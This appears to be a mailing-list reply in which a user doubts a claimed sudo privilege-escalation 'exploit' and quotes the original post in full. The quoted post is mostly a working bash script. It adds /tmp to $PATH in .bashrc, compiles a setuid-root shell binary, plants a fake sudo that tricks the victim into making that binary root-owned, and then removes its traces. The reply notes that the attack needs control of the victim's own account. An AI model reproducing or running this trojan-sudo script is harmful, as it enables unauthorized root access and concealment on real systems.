It escapes me how changing your own $PATH makes another user execute files in /tmp. And if someone has /tmp in $PATH moreover before anything else (or . for that matter) he deserves it. Right?
-- Vlad > I written an exploit which allow to became root when a normal user use sudo. > The following code add to the .bashrc configuration file the /tmp path. Then > when the user exec sudo he runs the fake one, giving you a root shell. Just > run it, when the normal user will use sudo you will get a root shell. > > chmod +x ./exploit.sh && ./exploit.sh > > #!/bin/bash > > PAYLOAD="/bin/bash" > CFILE=".temp0000" > PRIV="root" > COLOR='\033[1;31m' > > echo -e "$COLOR" > > echo -e "\n - Adding /tmp path on $HOME/.bashrc"; sleep 1 > echo export PATH=/tmp:$PATH >> $HOME/.bashrc > echo -e " - Creating C executable with setuid 0 " > sleep 1 > echo "#include <stdlib.h>" >/tmp/$CFILE.c > echo "int main(void) {" >>/tmp/$CFILE.c > echo "setuid(0);" >>/tmp/$CFILE.c > echo "system(\"$PAYLOAD\"); }" >>/tmp/$CFILE.c > /usr/bin/gcc /tmp/$CFILE.c -o /tmp/$CFILE &> /dev/null > rm -rf /tmp/$CFILE.c > echo -e " - Creating sudo script which will be executed by the victim "; > sleep 1 > echo "#!/bin/bash" > /tmp/sudo > echo "/usr/bin/sudo chown root:root /tmp/$CFILE && /usr/bin/sudo chmod 4755 > /tmp/$CFILE" >> /tmp/sudo > echo "/usr/bin/sudo \$1 \$2 \$3 \$4 \$5" >>/tmp/sudo && chmod +x /tmp/sudo > echo " - Wait while the victim open a shell and execute sudo" > while [[ $(stat -c '%U' /tmp/$CFILE) != $PRIV ]] ; > do > sleep 1 > done > echo -e " - Root shell with SETUID 0 created on $CFILE"; sleep 1 > echo -e " - Cleaning sudo script and path line\n"; sleep 1 > sed -i -e '/^export PATH/d' $HOME/.bashrc > rm -rf /tmp/sudo > /tmp/$CFILE > > Impact > > An attacker logged into a system as normal user, using a sudo weakness, can > escalate to root > > Sent with [ProtonMail](https://protonmail.com) Secure Email.